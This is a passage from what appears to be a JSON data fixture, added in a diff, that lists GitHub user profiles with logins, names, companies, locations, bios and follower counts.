0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-09-06T03:56:41Z", + "updated_at": "2023-07-24T20:43:14Z", + "node_id": "U_kgDOBrsIrg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2263, + "fields": { + "nest_created_at": "2024-09-12T01:13:20.386Z", + "nest_updated_at": "2024-09-12T01:13:20.386Z", + "name": "", + "login": "jdfresser", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60644781?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-02-04T08:19:42Z", + "updated_at": "2024-06-26T16:11:08Z", + "node_id": "MDQ6VXNlcjYwNjQ0Nzgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2264, + "fields": { + "nest_created_at": "2024-09-12T01:13:21.202Z", + "nest_updated_at": "2024-09-22T19:36:41.177Z", + "name": "Kirill Bludilin", + "login": "kir-b", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31217006?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-08-21T16:05:49Z", + "updated_at": "2024-09-04T20:51:52Z", + "node_id": "MDQ6VXNlcjMxMjE3MDA2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2265, + "fields": { + "nest_created_at": "2024-09-12T01:13:23.308Z", + "nest_updated_at": "2024-09-12T01:13:23.308Z", + "name": "", + "login": "scott86", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5334178?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2013-08-28T23:21:57Z", + "updated_at": "2024-08-05T17:32:40Z", + "node_id": "MDQ6VXNlcjUzMzQxNzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2266, + "fields": { + "nest_created_at": "2024-09-12T01:13:24.586Z", + "nest_updated_at": "2024-09-12T01:13:24.586Z", + "name": "", + "login": "ftotheasec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/142237229?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-08-14T14:06:09Z", + "updated_at": "2023-08-14T14:06:09Z", + "node_id": "U_kgDOCHpeLQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2267, + "fields": { + "nest_created_at": "2024-09-12T01:13:26.697Z", + "nest_updated_at": "2024-09-22T15:41:23.537Z", + "name": "Smaran Chand", + "login": "smaranchand", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36672015?v=4", + "company": "", + "location": "Kathmandu, Nepal", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 19, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2018-02-20T16:25:29Z", + "updated_at": "2024-08-14T17:22:45Z", + "node_id": "MDQ6VXNlcjM2NjcyMDE1", + "bio": "I act like a hacker, but I am not. I explore about application and cloud security.", + "is_hireable": true, + "twitter_username": "smaranchand" + } +}, +{ + "model": "github.user", + "pk": 2268, + "fields": { + "nest_created_at": "2024-09-12T01:13:27.948Z", + "nest_updated_at": "2024-09-22T19:35:17.979Z", + "name": "", + "login": "tomaszn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/981572?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 50, + "created_at": "2011-08-15T17:56:19Z", + "updated_at": "2024-09-03T11:22:23Z", + "node_id": "MDQ6VXNlcjk4MTU3Mg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2269, + "fields": { + "nest_created_at": "2024-09-12T01:13:30.084Z", + "nest_updated_at": "2024-09-12T01:13:30.084Z", + "name": "泰山", + "login": "cnsino", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/121778348?v=4", + "company": "Ciumhoa", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2023-01-02T02:30:09Z", + "updated_at": "2024-09-03T11:59:37Z", + "node_id": "U_kgDOB0IwrA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2270, + "fields": { + "nest_created_at": "2024-09-12T01:13:31.381Z", + "nest_updated_at": "2024-09-12T01:13:31.381Z", + "name": "", + "login": "drclark-dev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/144707252?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-09-11T14:59:13Z", + "updated_at": "2024-01-31T19:26:00Z", + "node_id": "U_kgDOCKAOtA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2271, + "fields": { + "nest_created_at": "2024-09-12T01:13:32.619Z", + "nest_updated_at": "2024-09-12T01:13:32.619Z", + "name": "", + "login": "ismaelcjr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/140366397?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-07-24T03:42:46Z", + "updated_at": "2023-09-19T05:52:38Z", + "node_id": "U_kgDOCF3SPQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2272, + "fields": { + "nest_created_at": "2024-09-12T01:13:33.905Z", + "nest_updated_at": "2024-09-22T19:35:32.758Z", + "name": "Sultan Baharuddin", + "login": "Roooodie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50097679?v=4", + "company": "", + "location": "makassar, indonesia", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2019-04-29T07:24:07Z", + "updated_at": "2024-08-22T16:30:04Z", + "node_id": "MDQ6VXNlcjUwMDk3Njc5", + "bio": " State Polytechnic of Ujung Pandang, Computer and Network Engineer 👾 || Beginner and Noob", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2273, + "fields": { + "nest_created_at": "2024-09-12T01:13:35.970Z", + "nest_updated_at": "2024-09-22T19:36:19.362Z", + "name": "Sébastien GLON", + "login": "sebglon", + "email": "sebglon@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3148666?v=4", + "company": "Ubble.ai", + "location": "Nantes", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 5, + "public_gists_count": 7, + "public_repositories_count": 52, + "created_at": "2012-12-29T15:11:02Z", + "updated_at": "2024-09-16T11:26:41Z", + "node_id": "MDQ6VXNlcjMxNDg2NjY=", + "bio": "", + "is_hireable": true, + "twitter_username": "SebastienGlon" + } +}, +{ + "model": "github.user", + "pk": 2274, + "fields": { + "nest_created_at": "2024-09-12T01:13:37.393Z", + "nest_updated_at": "2024-09-12T01:13:37.393Z", + "name": "", + "login": "peeqonet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/143388250?v=4", + "company": "", + "location": "Fr", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-08-28T07:49:26Z", + "updated_at": "2024-09-09T07:02:23Z", + "node_id": "U_kgDOCIvuWg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2275, + "fields": { + "nest_created_at": "2024-09-12T01:13:40.371Z", + "nest_updated_at": "2024-09-12T01:13:40.371Z", + "name": "", + "login": "meytrix183", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31131698?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2017-08-18T12:04:05Z", + "updated_at": "2024-09-09T09:12:41Z", + "node_id": "MDQ6VXNlcjMxMTMxNjk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2276, + "fields": { + "nest_created_at": "2024-09-12T01:13:41.594Z", + "nest_updated_at": "2024-09-22T19:38:19.223Z", + "name": "Quirin Hardy Zießler", + "login": "quirinziessler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19915467?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2016-06-13T18:58:18Z", + "updated_at": "2024-09-18T11:34:35Z", + "node_id": "MDQ6VXNlcjE5OTE1NDY3", + "bio": "", + "is_hireable": false, + "twitter_username": "zie_ler" + } +}, +{ + "model": "github.user", + "pk": 2277, + "fields": { + "nest_created_at": "2024-09-12T01:13:42.893Z", + "nest_updated_at": "2024-09-12T01:13:42.893Z", + "name": "Erdem Özgen", + "login": "ErdemOzgen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14043035?v=4", + "company": "HAVELSAN", + "location": "Learning Land", + "collaborators_count": 0, + "following_count": 340, + "followers_count": 181, + "public_gists_count": 9, + "public_repositories_count": 140, + "created_at": "2015-08-30T17:12:04Z", + "updated_at": "2024-08-25T11:29:27Z", + "node_id": "MDQ6VXNlcjE0MDQzMDM1", + "bio": "Software Developer and ML Enthusiast", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2278, + "fields": { + "nest_created_at": "2024-09-12T01:13:44.158Z", + "nest_updated_at": "2024-09-12T01:13:44.158Z", + "name": "Bilal Mirza", + "login": "bilalmirza74", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84387676?v=4", + "company": "", + "location": "hyd", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 67, + "created_at": "2021-05-18T11:58:36Z", + "updated_at": "2024-09-02T12:26:21Z", + "node_id": "MDQ6VXNlcjg0Mzg3Njc2", + "bio": ".", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2279, + "fields": { + "nest_created_at": "2024-09-12T01:13:45.422Z", + "nest_updated_at": "2024-09-12T01:13:45.422Z", + "name": "Deep", + "login": "DeepRahangdale", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/115669089?v=4", + "company": "Indian Institute of Information Technology Kottayam", + "location": "Gondia, Maharashtra", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2022-10-12T21:38:06Z", + "updated_at": "2024-09-04T21:05:48Z", + "node_id": "U_kgDOBuT4YQ", + "bio": "SDE Intern'23 @TVS Sensing & Solution | Web Developer @digitomize[Microsoft for Startup Founder Hub] @TBD | Rust Enthusiast | Oracle Cloud Certified | IIITK'25", + "is_hireable": true, + "twitter_username": "DeepRahangdale1" + } +}, +{ + "model": "github.user", + "pk": 2280, + "fields": { + "nest_created_at": "2024-09-12T01:13:46.756Z", + "nest_updated_at": "2024-09-22T19:35:26.245Z", + "name": "", + "login": "WojTecH94", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19763370?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-06-05T16:52:53Z", + "updated_at": "2024-08-16T09:56:39Z", + "node_id": "MDQ6VXNlcjE5NzYzMzcw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2281, + "fields": { + "nest_created_at": "2024-09-12T01:13:49.442Z", + "nest_updated_at": "2024-09-12T01:13:49.443Z", + "name": "", + "login": "anetafa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/143069544?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-08-24T07:17:27Z", + "updated_at": "2024-06-12T13:19:58Z", + "node_id": "U_kgDOCIcRaA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2282, + "fields": { + "nest_created_at": "2024-09-12T01:13:50.718Z", + "nest_updated_at": "2024-09-22T19:36:31.117Z", + "name": "", + "login": "JoBaBe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28590541?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-05-10T08:02:15Z", + "updated_at": "2023-11-13T08:25:07Z", + "node_id": "MDQ6VXNlcjI4NTkwNTQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2283, + "fields": { + "nest_created_at": "2024-09-12T01:13:52.080Z", + "nest_updated_at": "2024-09-12T01:13:52.080Z", + "name": "Michał Winciorek", + "login": "Wincioor11", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38164733?v=4", + "company": "Netcompany", + "location": "Warsaw", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2018-04-07T18:12:40Z", + "updated_at": "2024-08-05T15:27:23Z", + "node_id": "MDQ6VXNlcjM4MTY0NzMz", + "bio": "Machine Learning, Software Development, and DevOps.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2284, + "fields": { + "nest_created_at": "2024-09-12T01:13:54.686Z", + "nest_updated_at": "2024-09-12T01:13:54.686Z", + "name": "", + "login": "nedakheiri", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/102523375?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-03-28T11:27:47Z", + "updated_at": "2024-09-01T14:56:45Z", + "node_id": "U_kgDOBhxh7w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2285, + "fields": { + "nest_created_at": "2024-09-12T01:13:59.985Z", + "nest_updated_at": "2024-09-22T19:35:20.225Z", + "name": "", + "login": "testaccount90009", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122134756?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-01-07T01:39:40Z", + "updated_at": "2024-08-12T16:27:06Z", + "node_id": "U_kgDOB0eg5A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2286, + "fields": { + "nest_created_at": "2024-09-12T01:14:01.272Z", + "nest_updated_at": "2024-09-12T01:14:01.272Z", + "name": "", + "login": "ahammoudeh96", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/152085366?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-26T16:09:20Z", + "updated_at": "2023-11-26T16:09:20Z", + "node_id": "U_kgDOCRCjdg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2287, + "fields": { + "nest_created_at": "2024-09-12T01:14:02.103Z", + "nest_updated_at": "2024-09-12T01:15:39.409Z", + "name": "Trần Ngọc Nam", + "login": "tsukiazuma", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75791054?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2020-12-10T12:57:14Z", + "updated_at": "2024-01-29T09:36:17Z", + "node_id": "MDQ6VXNlcjc1NzkxMDU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2288, + "fields": { + "nest_created_at": "2024-09-12T01:14:02.963Z", + "nest_updated_at": "2024-09-12T01:14:02.963Z", + "name": "BoBeR182", + "login": "BoBeR182", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/525433?v=4", + "company": "", + "location": "Antarctica", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2010-12-16T06:44:51Z", + "updated_at": "2024-09-07T22:25:13Z", + "node_id": "MDQ6VXNlcjUyNTQzMw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2289, + "fields": { + "nest_created_at": "2024-09-12T01:14:04.208Z", + "nest_updated_at": "2024-09-22T20:25:35.976Z", + "name": "Jeremy Bonghwan Choi", + "login": "jeremychoi", + "email": "jechoi@redhat.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25311915?v=4", + "company": "Red Hat", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 42, + "created_at": "2017-01-24T00:40:08Z", + "updated_at": "2024-07-04T03:18:19Z", + "node_id": "MDQ6VXNlcjI1MzExOTE1", + "bio": "Red Hat Product Security engineer, Security Research team lead", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2290, + "fields": { + "nest_created_at": "2024-09-12T01:14:05.487Z", + "nest_updated_at": "2024-09-22T19:35:11.572Z", + "name": "", + "login": "ninp0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1008583?v=4", + "company": "0day Inc.", + "location": "", + "collaborators_count": 0, + "following_count": 59, + "followers_count": 20, + "public_gists_count": 218, + "public_repositories_count": 24, + "created_at": "2011-08-27T14:46:57Z", + "updated_at": "2024-04-09T17:52:05Z", + "node_id": "MDQ6VXNlcjEwMDg1ODM=", + "bio": "Twitter: https://twitter.com/ninp0", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2291, + "fields": { + "nest_created_at": "2024-09-12T01:14:06.739Z", + "nest_updated_at": "2024-09-22T19:35:55.401Z", + "name": "Nguyen Dinh Bien", + "login": "biennd279", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44922242?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 48, + "created_at": "2018-11-10T11:48:54Z", + "updated_at": "2024-08-31T16:05:20Z", + "node_id": "MDQ6VXNlcjQ0OTIyMjQy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2292, + "fields": { + "nest_created_at": "2024-09-12T01:14:07.992Z", + "nest_updated_at": "2024-09-22T19:43:18.021Z", + "name": "Stephan Pillhofer", + "login": "StephanPillhofer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43667664?v=4", + "company": "", + "location": "Austria", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-09-28T07:45:55Z", + "updated_at": "2024-09-11T15:13:26Z", + "node_id": "MDQ6VXNlcjQzNjY3NjY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2293, + "fields": { + "nest_created_at": "2024-09-12T01:14:10.552Z", + "nest_updated_at": "2024-09-22T19:35:42.614Z", + "name": "Tanvi Patil", + "login": "tpat13", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32806320?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2017-10-15T02:03:33Z", + "updated_at": "2024-04-01T12:30:06Z", + "node_id": "MDQ6VXNlcjMyODA2MzIw", + "bio": "Just a little guy", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2294, + "fields": { + "nest_created_at": "2024-09-12T01:14:11.811Z", + "nest_updated_at": "2024-09-12T01:14:11.811Z", + "name": "James Luther", + "login": "james-luther", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81767471?v=4", + "company": "@colibrisec", + "location": "Solidaridad, Q.R.", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2021-04-01T16:10:22Z", + "updated_at": "2024-08-10T20:10:32Z", + "node_id": "MDQ6VXNlcjgxNzY3NDcx", + "bio": "Cybersecurity Professional", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2295, + "fields": { + "nest_created_at": "2024-09-12T01:14:17.442Z", + "nest_updated_at": "2024-09-12T01:14:17.442Z", + "name": "szEvEz", + "login": "szEvEz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17480438?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 18, + "public_gists_count": 3, + "public_repositories_count": 36, + "created_at": "2016-02-25T17:49:56Z", + "updated_at": "2024-07-02T10:18:36Z", + "node_id": "MDQ6VXNlcjE3NDgwNDM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2296, + "fields": { + "nest_created_at": "2024-09-12T01:14:20.273Z", + "nest_updated_at": "2024-09-12T01:14:20.273Z", + "name": "Δpxitekt0r", + "login": "apxitekt0r", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36531246?v=4", + "company": "", + "location": "Moscow", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-02-16T08:08:02Z", + "updated_at": "2024-07-12T14:02:25Z", + "node_id": "MDQ6VXNlcjM2NTMxMjQ2", + "bio": "I explore for myself something new to develop myself.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2297, + "fields": { + "nest_created_at": "2024-09-12T01:14:21.079Z", + "nest_updated_at": "2024-09-12T01:14:21.079Z", + "name": "Ashad Mohamed", + "login": "deigott", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/143202415?v=4", + "company": "@thelitesecurity", + "location": "", + "collaborators_count": 0, + "following_count": 45, + "followers_count": 29, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2023-08-25T14:58:51Z", + "updated_at": "2024-08-29T13:56:51Z", + "node_id": "U_kgDOCIkYbw", + "bio": "ist es sicher?", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2298, + "fields": { + "nest_created_at": "2024-09-12T01:14:21.990Z", + "nest_updated_at": "2024-09-22T19:40:10.229Z", + "name": "", + "login": "lme-nca", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/79927042?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2021-03-02T15:50:59Z", + "updated_at": "2022-12-16T09:51:40Z", + "node_id": "MDQ6VXNlcjc5OTI3MDQy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2299, + "fields": { + "nest_created_at": "2024-09-12T01:14:23.357Z", + "nest_updated_at": "2024-09-12T01:14:23.357Z", + "name": "", + "login": "alfajr", + "email": "muhammadalfajri13@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16153856?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-12-04T15:01:19Z", + "updated_at": "2024-06-13T19:34:14Z", + "node_id": "MDQ6VXNlcjE2MTUzODU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2300, + "fields": { + "nest_created_at": "2024-09-12T01:14:27.204Z", + "nest_updated_at": "2024-09-12T01:14:27.204Z", + "name": "Sergio Fernández", + "login": "GeiserX", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9169332?v=4", + "company": "ACSdesk", + "location": "Spain", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 20, + "public_gists_count": 1, + "public_repositories_count": 37, + "created_at": "2014-10-12T21:57:52Z", + "updated_at": "2024-08-26T20:22:29Z", + "node_id": "MDQ6VXNlcjkxNjkzMzI=", + "bio": "Cloud DevOps Engineer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2301, + "fields": { + "nest_created_at": "2024-09-12T01:14:28.463Z", + "nest_updated_at": "2024-09-22T19:36:25.431Z", + "name": "Benjamin", + "login": "prempador", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9047327?v=4", + "company": "", + "location": "Vienna", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 20, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-10-07T06:48:04Z", + "updated_at": "2024-09-17T09:12:48Z", + "node_id": "MDQ6VXNlcjkwNDczMjc=", + "bio": "Staff IT Security Engineer at @bitpanda-labs ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2302, + "fields": { + "nest_created_at": "2024-09-12T01:14:30.958Z", + "nest_updated_at": "2024-09-12T01:14:30.958Z", + "name": "Steve Lohr", + "login": "schdief", + "email": "schdief.law@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10979159?v=4", + "company": "DHL Group", + "location": "Schmölln-Putzkau", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2015-02-12T16:03:45Z", + "updated_at": "2024-06-17T11:51:57Z", + "node_id": "MDQ6VXNlcjEwOTc5MTU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2303, + "fields": { + "nest_created_at": "2024-09-12T01:14:33.419Z", + "nest_updated_at": "2024-09-12T01:14:33.419Z", + "name": "", + "login": "sravanee98", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60765014?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2020-02-07T02:19:28Z", + "updated_at": "2024-01-23T02:48:22Z", + "node_id": "MDQ6VXNlcjYwNzY1MDE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2304, + "fields": { + "nest_created_at": "2024-09-12T01:14:34.257Z", + "nest_updated_at": "2024-09-22T19:36:26.381Z", + "name": "Cedric Buissart", + "login": "cedricbu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10559539?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2015-01-16T09:31:51Z", + "updated_at": "2024-06-07T09:47:25Z", + "node_id": "MDQ6VXNlcjEwNTU5NTM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2305, + "fields": { + "nest_created_at": "2024-09-12T01:14:35.612Z", + "nest_updated_at": "2024-09-12T01:14:35.612Z", + "name": "Davorin", + "login": "dkoci", + "email": "davorin85@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5565897?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2013-09-28T19:37:03Z", + "updated_at": "2024-07-04T11:47:01Z", + "node_id": "MDQ6VXNlcjU1NjU4OTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2306, + "fields": { + "nest_created_at": "2024-09-12T01:14:38.073Z", + "nest_updated_at": "2024-09-12T01:14:38.073Z", + "name": "", + "login": "lappsec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22598243?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-10-03T16:53:16Z", + "updated_at": "2023-11-17T01:45:25Z", + "node_id": "MDQ6VXNlcjIyNTk4MjQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2307, + "fields": { + "nest_created_at": "2024-09-12T01:14:40.606Z", + "nest_updated_at": "2024-09-12T01:14:40.606Z", + "name": "Paul Volosen", + "login": "paul007ex", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43864272?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-10-04T21:04:36Z", + "updated_at": "2024-09-04T11:43:14Z", + "node_id": "MDQ6VXNlcjQzODY0Mjcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2308, + "fields": { + "nest_created_at": "2024-09-12T01:14:41.601Z", + "nest_updated_at": "2024-09-12T01:14:41.601Z", + "name": "Srikanth Kumbala", + "login": "skumbala40", + "email": "", + "avatar_url": 